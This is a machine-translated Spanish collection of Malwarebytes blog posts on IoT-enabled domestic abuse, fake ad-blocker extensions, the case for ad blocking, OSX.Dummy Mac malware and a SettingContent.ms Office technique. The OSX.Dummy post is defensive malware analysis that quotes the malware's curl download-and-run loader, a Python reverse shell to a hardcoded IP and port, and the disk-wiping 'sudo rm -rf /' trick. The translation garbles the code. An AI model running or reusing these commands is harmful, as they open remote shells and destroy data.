Todo tipo de cosas extrañas pueden salir mal con algún spyware comprado. Tal vez haya un servidor al que necesite llamar, pero el servidor está desconectado temporalmente o se ha apagado. Tal vez la conexión a Internet es un poco escamosa, y no está enviando datos a la base. ¿Qué pasa si el codificador no era bueno y algo al azar comenzó a desmoronarse? Hay tantas variables involucradas que muchos abusadores podrían no saber qué hacer al respecto.

Sin embargo, se espera que un poco estándar de IoT comercial funcione de cierta manera y cuando de repente no lo haga. El abusador lo sabrá.

Abordando el problema

A pesar de los desafíos, hay algunas cosas que podemos hacer para al menos obtener un punto de apoyo contra los atacantes nacionales.

1) Mantenga un registro: con la advertencia estándar de que hacer una acción X puede atraer la atención Y, un registro es un pilar de los casos de abuso. Prácticamente todos los que han experimentado este abuso y lo hablan públicamente dirán lo mismo: sean conscientes de lo obvio que es su registro . Un libro puede funcionar para algunos, el texto ofuscado en el código puede funcionar para otros (aunque podría atraer un interés injustificado si se descubriera). Puede ser más fácil esconder un libro que mantenerlo alejado de su computadora portátil.

Por supuesto, adaptarse a la situación en cuestión; si ya no vives con la pareja abusiva, es probable que no lean tu diario en papel guardado en un armario. ¿Qué tal una aplicación móvil? Hay herramientas en las que puede detallar información que no se guarda en el dispositivo a través de programas diseñados para parecerse a aplicaciones meteorológicas . Si puede construir una imagen de cada vez que la calefacción se vuelve insoportable, o las luces entran en sobremarcha, o las alarmas comienzan a zumbar, estos son datos valiosos para la aplicación de la ley.

2) La correlación es una cosa maravillosa. Muchos de los dispositivos más populares mantendrán estadísticas detalladas de uso. Nest, por ejemplo, «recopila estadísticas de uso del dispositivo» (2.1, Privacidad del usuario) como se menciona en este documento de Black Hat [PDF]. Si alguien eventualmente va a la policía con sus registros, y la policía puede obtener estadísticas de uso para (digamos) fluctuaciones extremas de temperatura, o puertas cerradas, o bombillas que se vuelven locas, entonces las cosas rápidamente parecen problemáticas para el abusador.

Este sería especialmente el caso donde las estadísticas registradas en el dispositivo coinciden con lo que haya escrito en su diario físico o guardado en su aplicación móvil segura.

3) Este es un problema bastante nuevo que ha salido a la luz, y la mayoría de las discusiones al respecto en círculos tecnológicos están llenas de gente de tecnología que dice: «No tenía idea de que esto fuera una cosa hasta ahora». Si hay un refugio local para cónyuges abusados ​​y usted es bueno con esta área de tecnología / seguridad / privacidad, es posible que desee aparecer y ver si hay algo que pueda hacer para ayudar a transmitir información útil. Es probable que no tengan a nadie en el personal que pueda ayudar con este caso particular. Cuanto más compartimos entre nosotros, más podremos apoyar a los socios abusados ​​para superar sus situaciones.

4) Si ha escapado de un cónyuge abusivo pero ha traído tecnología con usted, no hay garantía de que no haya sido completamente comprometida. ¿Ustedes dos tienen acceso de administrador a los dispositivos? ¿Has cambiado la (s) contraseña (s) desde que te mudaste? ¿Qué tipo de información se revela en la consola de administración? ¿Menciona las direcciones IP utilizadas, quizás la ubicación geográfica, o tal vez una nueva dirección de correo electrónico que utilizó para configurar las cosas de nuevo? Si ha estado experimentando cosas extrañas en su hogar desde que volvió a enchufar todo, y se parecen al tipo de engaño enumerado anteriormente, es muy posible que el socio abusivo todavía no sirva para nada.

Hemos detectado al menos un ejemplo en el que una organización ha realizado un trabajo de depuración de IoT . La idea de «hacerles fantasmas», que mantiene al menos un dispositivo comprometido en funcionamiento para hacer que el abusador piense que todo está bien, es interesante, pero potencialmente no sin riesgos. Si es posible, nuestro consejo es destruir todas las piezas de tecnología que se hayan traído para el viaje. IoT es algo tan complejo de configurar, con tantas partes móviles, que es imposible decir con certeza que todo ha sido exorcizado tecnológicamente.

Sin solución rápida

Sería genial si hubiera algún tipo de solución mágica tecnológica que pudiera solucionar este problema, pero como verás después de indagar sobre el tema «IoT scrub job», muchos profesionales de seguridad recién están comenzando a entender este tipo. del asalto digitalizado, así como las mejores formas de combatirlo. Al igual que con todo el abuso doméstico, la precaución es clave, y no debemos apresurarnos a dar consejos que potencialmente podrían poner a alguien en mayor peligro. Frustrante, una sorprendente cantidad de los mejores resultados en los motores de búsqueda para ayudar con estos tipos de ataques da como resultado 404 páginas de error o sitios web que simplemente ya no existen.

Claramente, todos necesitamos mejorar nuestro juego en círculos tecnológicos y ver qué podemos hacer para poner fuera de combate este espectáculo de terror habilitado para IoT antes de que pierda el control. A medida que IoT continúa integrándose en la vida cotidiana de las personas, de maneras que no pueden ser fácilmente arrancadas después, el potencial de daño masivo a los miembros más vulnerables de la sociedad nos está mirando a la cara. Tenemos que estar a la altura del desafío.

Pormalwarebytes

Bloqueamos bloqueadores de anuncios sombríos

 

 

Bloqueamos bloqueadores de anuncios sombríos

 

 

Publicado: 11 de julio de 2018 por 

Algunos de ustedes se han comunicado con nosotros en relación con el bloqueo por parte de Malwarebytes de ciertas extensiones de bloqueo de anuncios, o una afluencia de notificaciones de bloqueo web. Lo primero es lo primero, esto no es un falso positivo. Recientemente, en su blog, AdGuard descubrió que se encontraron numerosas extensiones de bloqueo de anuncios maliciosos en la tienda de Google Chrome. Según un artículo de ZDNet , las extensiones maliciosas se han eliminado desde la tienda, sin embargo, se estima que 20 millones de dispositivos descargaron estas aplicaciones mientras aún estaban en línea, es posible que usted tenga uno de esos dispositivos.

Las extensiones se utilizan básicamente para convertir el navegador en un zombie bajo el control de un atacante remoto, básicamente, agregar su dispositivo a una botnet. Como nuestra capacidad para eliminar extensiones es limitada, estamos bloqueando los dominios a los que llegan las extensiones maliciosas, por lo que, como mínimo, los usuarios no tendrán sus sistemas controlados por un cibercriminal.

Si obtiene ventanas emergentes como las anteriores, consistentemente, puede estar ejecutando una de las extensiones maliciosas. Aquí hay una lista completa:

  • AdRemover para Google Chrome ™
  • uBlock Plus
  • Adblock Pro
  • HD para YouTube ™
  • Webutation

Si es así, tu mejor opción es eliminarlo de tu navegador.

Consulte nuestra guía sobre Adware , que incluye una sección sobre la eliminación de extensiones.

Echa un vistazo a los nombres de algunas de estas «extensiones», ¿notas algo? Adblock Pro, uBlock, YouTube, todos los grandes nombres y palabras de moda que hacen que estas extensiones parezcan más legítimas, agregan el hecho de que los comentarios falsos y las revisiones se crean todo el tiempo para este tipo de herramientas y, al final del día, el criminal es contando con su capacidad para no darse cuenta de que «esta no es la aplicación que está buscando».

Tenga en cuenta lo que instala en su navegador y, en general, en su computadora, al igual que los DVD baratos que puede encontrar en la tienda, que tienen títulos increíblemente similares a una gran película de gran éxito , que la gente que no está tan familiarizada con la el material original pasa por alto el hecho de que están comprando una imitación. Piense en esto de la misma manera con las extensiones y complementos y complementos para sus navegadores, hay algunos muy buenos, pero hay MUCHOS imitadores sombríos.

Asegúrese de revisar las opiniones de los usuarios, los números de descarga e incluso las recomendaciones externas (buscar el «mejor bloqueador de anuncios» podría ser un buen lugar para comenzar). Esto asegurará que haya instalado la herramienta correcta que hará el mejor trabajo.

Gracias por leer, navegación segura, ¡nos vemos la próxima vez!

Pormalwarebytes

Todos están bloqueando anuncios, ¿por qué no?

Publicado: 9 de julio de 2018 por 
Última actualización: 4 de julio de 2018

Esta publicación puede alterar algunas plumas. Pero no estamos aquí para ofrecer consejos a los editores sobre cómo generar mejores ingresos para su marca. Por el contrario, estamos aquí para ofrecer el mejor consejo sobre cómo mantener un entorno seguro y protegido.

Si no está bloqueando anuncios en su PC y dispositivo móvil, ¡debería hacerlo! Y si conoce a alguien que no está bloqueando anuncios, envíeles esta publicación. Porque en esta serie de dos partes, vamos a disipar algunos de los mitos que rodean el bloqueo de anuncios, y cubriremos las razones por las que debería estar bloqueando los anuncios en su red y dispositivos.

A continuación, realizaremos un seguimiento en la Parte 2 de esta serie al analizar herramientas y configuraciones comunes para ayudarlo a aprovechar al máximo su experiencia de navegación.

Has escuchado la charla y visto los mensajes en banners en línea. Usted es consciente de las disputas y la provocación de los editores y anunciantes de que el bloqueo de anuncios es un acto moralmente desmedido cuyos usuarios merecen un destierro directo de la web. Tal vez te han influido las súplicas de los propietarios de sitios web y tienen empatía hacia las frágiles limitaciones presupuestarias de tus sitios favoritos. O tal vez no comprenda los riesgos asociados con el seguimiento y la publicidad en línea y piense que si no hace clic en anuncios estará bien.

No te dejes engañar El bloqueo de anuncios proporciona una capa de seguridad vital que no solo corta un vector potencial para los ataques maliciosos en línea, sino que también bloquea los complementos de seguimiento que invaden la privacidad para recopilar y recopilar su información personal. No solo eso, sino que bloquea los anuncios y rastreadores en línea tiene la ventaja adicional de conservar el ancho de banda y la duración de la batería, aumentar los tiempos de respuesta del sitio web y, en general, mejorar la experiencia general del usuario. Por lo tanto, usar un bloqueador de anuncios no solo protege su dispositivo, sino que también brinda una mejor experiencia general para el usuario. ¿Qué no se podría amar?

¡Es todo un montón de alboroto!

Los anunciantes, editores y propietarios de sitios web desprecian las conversaciones sobre el bloqueo de los anuncios molestos que aparecen en sus páginas web, especialmente los anuncios que compiten más agresivamente por su atención (y, por lo tanto, pagan las facturas de los propietarios del sitio web). Todos los hemos visto. Estamos hablando de anuncios que reproducen automáticamente anuncios o clips de noticias tan pronto como se carga la página. Brillantes, llamativos ventanas emergentes y superposiciones de páginas que deben hacerse clic antes de ver el contenido deseado. Incluso los resultados patrocinados que aparecen en los listados de búsqueda. ¡Están en todos lados!

Cientos de miles de millones de impresiones de anuncios se producen cada mes, y se estima que los ingresos publicitarios digitales para publicidad en línea superarán los $ 237,000 millones en 2018 . Con tantas impresiones para ser atendidas, no es de extrañar que los operadores de sitios web estén despejando el espacio y abriendo el camino para que los anunciantes atemperen el panorama del sitio web.

Lista de búsqueda mostrada dentro de Google

Y obtenemos que las impresiones de anuncios son el alma de muchos operadores de sitios web y editores que dependen de los clics como mecanismo principal para generar ingresos. Algunos incluso pueden argumentar que los ‘clics crean trabajos’.

Pero enfrentémoslo. En la mayoría de los casos, los anuncios son una mierda! A los anunciantes les gusta impulsar la noción de «anuncios aceptables», «publicidad no intrusiva» y «cantidad razonable de impresiones», pero esta es una retórica diseñada para influir en la opinión de una sociedad impresionable, y es todo un poppycock si Pregúnteme.

A la mayoría de las personas no les gustan los anuncios. Ellos nunca tuvieron. Es por eso que las videograbadoras se volvieron populares en los años 80. Los dispositivos permitieron a los usuarios configurar grabaciones y luego omitir anuncios según su conveniencia más adelante. Es por eso que los DVR se convirtieron en la corriente principal hace años, y por qué las personas acuden a servicios de transmisión como Netflix ahora. Es incluso la razón por la que las personas omiten los primeros minutos de una película.

Los anuncios disminuyen la experiencia general del usuario al forzar la atención del consumidor en otra parte, y crean un retraso o una molestia en la capacidad de ingerir el contenido preferido. Los listados «patrocinados» de un sitio web a menudo consumen mucho más del paisaje de la página que el contenido real, lo que hace que dedique más tiempo a buscar los artículos deseados. Esto puede llevar a que los consumidores paguen más de lo que se hubiera pagado con un competidor no patrocinado. Y luego están los anuncios que son deliberadamente desagradables o reproducen sonidos recurrentes en una pequeña caja en la esquina de la ventana. Todos son simplemente terribles de soportar.

Si se tratara simplemente de no disfrutar el contenido, entonces este punto sería discutible. Sin embargo, los anuncios en línea representan una amenaza y proporcionan un vector de infección para que los actores malintencionados puedan lanzar ataques de malware. Esto puede convertir incluso los sitios web de mayor reputación en posibles sistemas de entrega para los autores de malware.

El malware puede ser entregado dentro de ese anuncio

Los anuncios permiten pequeños anuncios divertidos y llamativos que pueden jugar juegos y cuestionarios, pero al mismo tiempo esta funcionalidad representa un gran riesgo para los consumidores.

La publicidad maliciosa tiene la capacidad de afectar incluso a los usuarios más cuidadosos debido a la naturaleza de cómo los anuncios están diseñados para ejecutar código automáticamente cuando se cargan. Los atacantes pueden ( y lo hacen ) adjuntar códigos de exploits maliciosamente ocultos a anuncios que de otro modo serían inocuos para productos conocidos y luego enviar estos anuncios para su publicación a sitios web conocidos y de buena reputación.

No se deje engañar por este anuncio de Best Buy. ¡No es real!

Si bien muchas de las grandes redes publicitarias realizan la diligencia debida y buscan ese contenido malicioso antes de su publicación, existen docenas, sino cientos de redes publicitarias a las que un delincuente puede enviar su código malicioso. Y no todas esas compañías poseen los mismos estándares que sus contrapartes multimillonarias. Teniendo en cuenta la velocidad y la naturaleza del proceso de pujas en tiempo real para los anuncios en línea (un proceso fascinante que merece una publicación propia) no es de extrañar que los anuncios malos puedan pasar incluso las redes publicitarias más bien intencionadas.

$ 5.00 y 10 minutos es todo lo que se necesita con esta red publicitaria.

Considere por un momento esta  publicación de blog publicada por Google a principios de este año, que arroja algo de luz sobre la cantidad de anuncios maliciosos que fueron bloqueados a través del ecosistema publicitario. En la publicación, Google estipula que se eliminaron 3,2 mil millones de anuncios en 2017 por infringir las políticas publicitarias. Eso se traduce en 100 anuncios por cada segundo, de cada día, durante todo el año. De estos anuncios, 79 millones empujaban sitios web cargados de malware. Y eso se suma a los más de 320,000 editores que fueron incluidos en la lista negra, y más de 1 millón de sitios web y aplicaciones que fueron eliminados o bloqueados.

¡Son muchos anuncios malos!

Dejando a un lado la capacidad de Google para bloquear el contenido malicioso tal como aparece en su red, algunos pueden afirmar que con tantas cosas malas, algunas cosas pueden pasar desapercibidas devez en cuando.

Y, para que no nos olvidemos, hay una plétora de otras compañías de sitios web, noticias y publicidad sin los medios o el deseo de vigilar el contenido. Los actores malintencionados pueden lanzar campañas altamente orientadas, que solo pueden ser visibles para un pequeño grupo de personas y que a menudo pueden pasar desapercibidas para los mecanismos y sistemas de seguridad. ¿Quién quiere ser el conejillo de indias y ofrecer su computadora a los atacantes cuando ocurren tales fallas?

No me sigas, hermano

Todos estamos familiarizados con el escándalo de Cambridge Analytica que involucra la recopilación de aproximadamente 87 millones de registros de Facebook. El evento altamente publicitado ha llevado a procedimientos de insolvencia en contra de la empresa (aunque Cambridge Analytica puede haber sido resucitado recientemente bajo el nombre de Data Propria ). La gente se indignó en parte porque la empresa había recopilado y almacenado información en amplios sectores de la población sin su consentimiento. Pero lo que esas mismas personas pueden no entender es que Cambridge Analytica no está solo en esta práctica.

Existen numerosas organizaciones que van desde pequeñas operaciones de una y dos personas, hasta corporaciones de millones de dólares que participan en el proceso de recopilación y venta de datos de consumidores. Los corredores de datos, los almacenes de datos y las plataformas de intercambio de datos proporcionan herramientas y servicios no solo para recopilar información, sino también para clasificar y organizar la información de manera que los anunciantes puedan dirigirse a grupos específicos de usuarios.

Agente de datos en línea que ofrece «datos que solo tienen segundos de antigüedad»

Pocas de estas organizaciones tienen el consentimiento expreso de los usuarios para recolectar y almacenar su información, y muchas carecen incluso de los protocolos de seguridad más básicos para proteger y mantener la información una vez que se recolecta.

Considere la exposición reciente de la base de datos que rodea al intermediario de datos, Exactis . Hace poco se acusó a la compañía de tener un servidor pobremente asegurado, que comprometió casi 340 millones de registros individuales que contenían todo, desde direcciones, números de teléfono y direcciones de correo electrónico, hasta más de 400 puntos de datos diferentes de hábitos, intereses y pasatiempos. Todo tipo de otros detalles personales son rastreados, cosechados y almacenados en estas bases de datos; todo desde la edad hasta el tamaño de la ropa de una persona y el historial de compras. ¿Fuma, bebe o disfruta del juego? Eso está ahí, también.

Exactis tiene más de 3,5 mil millones de registros, con información sobre la mayoría de nosotros

¿Y quién exactamente es Exactis ? La compañía afirma ser un compilador y recopilador líder de datos de empresas y consumidores. La información recopilada por la empresa se utiliza para la creación de perfiles de clientes y para ayudar a los especialistas en marketing a identificar rasgos descriptivos y segmentos de clientes para ayudar a comprender mejor el comportamiento. Esta información se puede usar para dirigir publicidad dirigida a grupos específicos.

El sitio web de la compañía afirma poseer 3,5 mil millones de registros en 218 millones de personas y 110 millones de hogares. Cuando se le preguntó de dónde se originó la información, Vinny Troia, fundador de Night Lion Security, fue citado diciendo: «Parece que esta es una base de datos con prácticamente todos los ciudadanos estadounidenses en ella. No sé de dónde vienen los datos, pero es una de las colecciones más completas que he visto en mi vida «.

Si bien es posible que no sepamos con certeza, es probable suponer que al menos algunos de esos registros se obtienen mediante el uso de rastreadores en línea y servicios que se ejecutan silenciosamente en segundo plano, rastreando y registrando su comportamiento cada vez que navega en línea.

¿Por qué seguimos tolerando este tipo de recopilación de datos ilícitos? No seas como Steve Huffman, el CEO de Reddit que se permitió ser el blanco de un anuncio de Facebook con el propósito de solicitar empleo. En su lugar, use un bloqueador de anuncios, que no solo bloquea los rastreadores dirigidos que ponen en peligro su información personal y divulgue sus secretos al mejor postor, sino que también evitará que se muestre el anuncio orientado, reduciendo así su exposición a la infección y la solicitación.

No, no es moralmente inconsciente usar un bloqueador de anuncios

A pesar de los avisos, las súplicas de los propietarios de sitios web y la posición de anunciantes y editores de que el bloqueo de anuncios destruirá Internet tal como lo conocemos, no existen leyes contra el uso de un bloqueador de anuncios para evitar que aparezca contenido objetable en cualquier dispositivo que usted posea. o usar.

En un caso largamente seguido que trascendió hasta el Tribunal Supremo alemán, el editor europeo Axel Springer fue derrotado en una batalla de varios años contra el editor de Adblock Plus Eyeo, después de no convencer al tribunal de que el bloqueador de anuncios violó la ley de competencia y participando en políticas comerciales legalmente dudosas. (Su modelo de negocio permitió desbloquear anuncios considerados «aceptables», así como aquellos que pagaron por tal distinción).

El fallo judicial pone fin a la búsqueda de Springer de que el bloqueo de anuncios se considere ilegal. La decisión también justifica que los usuarios continúen utilizando el software de bloqueo para evitar que se muestren contenidos no deseados u objetables.

Es probable que los estadounidenses tengan protecciones de bloqueo de publicidad igualmente fuertes, si no más fuertes que nuestros amigos alemanes.

Al buscar a través de expedientes y documentos proporcionados por Justia.com , Eyeo, la empresa matriz de AdBlock Plus, no muestra un solo caso que la empresa haya tenido que defender debido a su práctica de bloquear anuncios. Y realmente, es casi un poco exagerado imaginar a un jurado estadounidense persuadido por el argumento de que los anunciantes tienen derecho a mostrar contenido, pero que los consumidores no tienen el derecho de bloquear dicho contenido cuando no lo aprueban.

Por lo tanto, sin leyes que impidan el uso de un bloqueador de publicidad, y con el argumento contrario simplemente reducido al mantra corporativo de «maximizar los beneficios», los consumidores pueden elegir la política de seguridad que mejor se adapte a sus necesidades.

¿Convencido ya?

Hemos visto que los anuncios no solo disminuyen la experiencia del usuario de ingerir contenido, sino que también representan un riesgo sustancial para los consumidores.

El potencial de malvertising para implementar con éxito una carga útil desagradable en su máquina, que puede comprometer su sistema y poner en peligro su seguridad financiera, es real. Peor aún, este tipo de ataques ni siquiera requieren la interacción del usuario y pueden ejecutarse simplemente visitando la página.

Y si la amenaza de la ruina financiera no es importante, entonces debería ser el acto de recolección de datos que invade la privacidad.

La variedad de recopiladores de datos y corredores de datos que hay por ahí es alucinante, y todos luchan por asociar sus acciones y comportamientos a grupos y otras personas con el único objetivo de crear anuncios dirigidos y aumentar las ganancias. La información recopilada por estas organizaciones puede estar poco segura y es una mina de oro potencial para cualquier cibercriminal.

Y si la convicción moral de bloquear los anuncios de sus sitios web favoritos ha impedido hasta ahora la adopción de tecnología de bloqueo de anuncios, entonces el conocimiento de un ecosistema publicitario cada vez mayor y la falta de leyes que impidan los mecanismos de bloqueo de anuncios deberían aliviar esas preocupaciones. . Sí, todos queremos generar ingresos para nuestra marca, pero personalmente prefiero no ayudar a hacer eso en aras de un posible robo de identidad, o peor, tener mi PC comprometida por un ataque de malware que se origina de un anuncio deshonesto en un sitio web popular. .

Subiendo 

En la Parte 2 de esta serie, vamos a echar un vistazo a algunas de las herramientas comunes de bloqueo de anuncios y cómo configurar esas herramientas para que se ajusten a las necesidades del usuario individual. Le mostraremos cómo navegar por configuraciones fáciles de usar que son lo suficientemente simples de usar en la computadora de la abuela. También profundizaremos en algunas configuraciones y herramientas más avanzadas que pueden requerir un cambio en la mentalidad, el uso y la comprensión del usuario antes de darnos cuenta completamente de los beneficios que ofrecen dichas configuraciones.

Cubriremos los anuncios bloqueados en dispositivos móviles y PC, y configuraremos una solución de red para bloquear anuncios en todo su entorno.

Así que estad atentos al blog Malwarebytes , o seguir esta publicación y lo actualizaremos con enlaces una vez disponibles.

Pormalwarebytes

El malware de Mac se dirige a los usuarios de cryptomining

El malware de Mac se dirige a los usuarios de cryptomining

 

La semana pasada, un investigador de seguridad llamado Remco Verhoef anunció el descubrimiento de una nueva pieza de malware de Mac que se distribuye en los grupos de chat cryptomining. Este malware luego fue analizado por Patrick Wardle , quien le dio el apodo apropiado OSX.Dummy.

El malware fue distribuido por usuarios de chat que se hicieron pasar por administradores, quienes publicaron el siguiente script de shell para que los usuarios puedan ejecutar:

cd / tmp && curl -s curl $ MALICIOUS_URL> script && chmod + x script && ./script

Este script descarga un archivo ejecutable llamado script de un sitio malicioso, le otorga permisos ejecutables y luego lo inicia. Este script tiene un tamaño ridículo de 34 megabytes, y parece que no hace más que crear un archivo de script de shell y un demonio de inicio para que siga funcionando.

El script de shell usa Python para abrir un shell inverso al puerto 1337 en un servidor malicioso, lo que le da al pirata informático el acceso continuo a la computadora.

#! / bin / bash
mientras :
hacer
  python -c 'socket de importación, subproceso, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); s.connect (("185.243.115.230", 1337)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call (["/ bin / sh", "- i"]); '
  dormir 5
hecho

En general, este malware no es particularmente excepcional, y hace honor al nombre OSX.Dummy de múltiples maneras. Sin embargo, hay algunas cosas interesantes que destacar sobre este malware.

Riesgos planteados por los guiones publicados

El método de distribución es interesante. Las personas en los foros y otras fuentes en línea han estado dando instrucciones que implican ejecutar comandos en la línea de comandos, en la Terminal en una Mac, durante muchos años, y todavía lo hacen hoy.

Como ejemplo, un usuario en los foros de Apple solía dar a los usuarios un comando de shell altamente ofuscado que constaba de decenas de miles de caracteres, con instrucciones para copiarlo y pegarlo en la Terminal para ejecutarlo. Esta secuencia de comandos fue ejecutada por los usuarios de los foros y el resultado del script publicado allí, miles de veces.

Afortunadamente, este script no fue malicioso, pero podría haberlo sido fácilmente, y su naturaleza ofuscada debería haber despertado sospechas. Sí, los usuarios todavía lo ejecutaron, sin entender lo que hacía, porque confiaban en un extraño en un foro.

Hubo otros casos en el pasado de que se publicaron scripts que eran realmente de naturaleza maliciosa. El más conocido de estos fue un truco infame donde los usuarios debían ejecutar el siguiente comando para resolver cualquier problema que tuvieran:

sudo rm -rf /

Desafortunadamente para los usuarios que realmente siguieron instrucciones como estas, este comando realmente borra el disco duro.

Por lo tanto, hay un precedente de sospecha de las secuencias de comandos de shell publicadas en línea, pero aun así, muchas personas seguirán ejecutando scripts muy sospechosos sin ningún cuidado. Se alienta a los lectores a educar a los usuarios sobre los peligros de este comportamiento en cada oportunidad.

Riesgos planteados por infecciones previas

Cuando se ejecuta por primera vez, el script ejecutable solicita una contraseña. Esto se parece al comportamiento de sudo estándar en la línea de comandos, pero en realidad, el malware recibe la contraseña. El malware crea un par de pequeños archivos de datos llamados dumpdummy- one en / Users / Shared / y uno en / tmp / –y almacena la contraseña allí, presumiblemente para un posible uso futuro.

Tener su contraseña almacenada en texto claro dentro de un archivo que pueda ser leída por cualquier persona en la computadora representa una seria amenaza a la seguridad. Peor aún, dado que este archivo solo es información y no es realmente malicioso, es probable que la mayoría del software antivirus no lo detecte. Esto significa que puede haber eliminado la infección, pero el archivo dumpdummypermanece, lo que representa un posible riesgo de seguridad en el futuro.

Esto dista mucho de la primera vez que el malware ha hecho tales cosas. Esto significa que, incluso si su computadora no está infectada actualmente, es muy posible que su contraseña se pueda encontrar en texto claro en algún lugar de su disco duro, como un remanente de una infección anterior. El futuro malware podría estar diseñado para encontrar las ubicaciones de estos archivos creados por el malware anterior, obteniendo acceso a su contraseña de forma gratuita.

Malwarebytes para Mac eliminará dichos rastreos además de los ejecutables maliciosos.

Riesgos planteados por el malware sin firmar

La mayoría, aunque no todos, del malware de Mac en la actualidad está firmado criptográficamente con un certificado emitido por Apple. Estos certificados no son difíciles de obtener, ya que no cuestan más de $ 99 para obtener una cuenta de desarrollador con Apple. Lo bueno de esto es que una vez que el malware es detectado por Apple, el certificado puede ser revocado, matando al malware.

Sin embargo, hay algunos problemas con la forma en que macOS maneja la firma de código, y esto no se puede confiar. Como señaló Wardle en su análisis, el hecho de que este malware no esté firmado es irrelevante, ya que macOS no verifica la firma del código para un proceso que se ejecuta desde la línea de comando.

Se presentará más información sobre cómo la firma de códigos puede ser un problema en macOS en la conferencia Virus Bulletin de este año.

Objetivo: robo de criptomonedas

En general, es poco probable que este malware esté muy extendido, y probablemente sabrá si se ha infectado después de leer una descripción del malware.

Todavía no sabemos exactamente qué pueden querer hacer los hackers detrás del malware con el acceso a las máquinas infectadas, pero dado el hecho de que las comunidades mineras de criptomonedas fueron atacadas, es una apuesta segura que estaban interesados ​​en el robo de criptomonedas. .

Si cree que puede estar infectado, Malwarebytes eliminará el malware, incluidos los archivos dumpdummy que contienen su contraseña.

Si realiza tareas de seguridad o TI para una empresa, asegúrese de bloquear el acceso a la dirección IP a la que la secuencia de comandos intentará conectarse (185.243.115.230).

Pormalwarebytes

Nueva técnica sin macros para distribuir malware

Publicado: 2 de julio de 2018 por 
Última actualización: 3 de julio de 2018

Uno de los vectores de infección más comunes y efectivos, especialmente para empresas, es el uso de documentos maliciosos de Office. Solo este año, fuimos testigos de dos días cero para Flash y el motor de VBScript , que primero se incorporaron a los documentos de Office antes de obtener una adopción más amplia en los kits de exploits web.

Además de aprovechar vulnerabilidades de software, los atacantes abusan regularmente de las características normales de Office, como macros, o de otras más oscuras como  Dynamic Data Exchange (DDE) y, por supuesto, ataques de enlace e incrustación de objetos (OLE), que también pueden combinarse con exploits . Los administradores del sistema pueden endurecer los puntos finales mediante la desactivación de ciertas funciones en toda la empresa, por ejemplo, para frustrar ciertos esquemas de ingeniería social que intentan engañar a los usuarios para que habiliten una macro maliciosa. En versiones recientes de Office , Microsoft también está bloqueando la activación de objetos considerados de alto riesgo, según una lista de extensiones que se pueden personalizar a través de la Política de grupo.

Pero un descubrimiento reciente del investigador de seguridad Matt Nelson , muestra que se puede aprovechar otro vector de infección, uno que elude la configuración de protección actual e incluso la nueva  tecnología de Reducción de Superficie de Ataque de Microsoft  . Al incrustar un archivo de configuración especialmente diseñado en un documento de Office, un atacante puede engañar a un usuario para que ejecute código malicioso sin más advertencias o notificaciones.

El formato de archivo, específico para Windows 10 llamado .SettingContent.ms , es esencialmente código XML que se utiliza para crear accesos directos al Panel de control. Esta característica se puede abusar porque uno de sus elementos (DeepLink) permite ejecutar cualquier binario con parámetros. Todo lo que un atacante debe hacer es agregar su propio comando usando Powershell.exe o Cmd.exe. Y el resto es historia.

Un nuevo script encontrado por Nick Carr muestra un ataque en el que se invoca PowerShell para descargar y ejecutar REMCOS RAT ( informe VT ). Según Matt Nelson , quien descubrió esta nueva técnica, Microsoft no va a solucionarlo, al menos por el momento.

Probamos esta muestra en nuestro laboratorio y nos complace informar que los usuarios de Malwarebytes ya están protegidos:

Durante los últimos años, aunque ha habido poco desarrollo con kits de exploits web , ha habido mucha actividad con kits de explotación de documentos como Microsoft Word Intruder (MWI) o Threadkit . Estos kits de herramientas permiten a los atacantes crear señuelos e incrustar los exploits de su elección antes de lanzar phishing a sus víctimas o enviar el archivo a través de campañas de spam más grandes. Al mismo tiempo, parece que los ataques clásicos de ingeniería social no van a ir a ningún lado pronto y seguirán aprovechando el elemento humano.

Es importante que los usuarios finales y las empresas reconozcan que los documentos son un vector ideal de entrega de malware y requieren una protección y capacitación adecuadas para luchar contra ellos.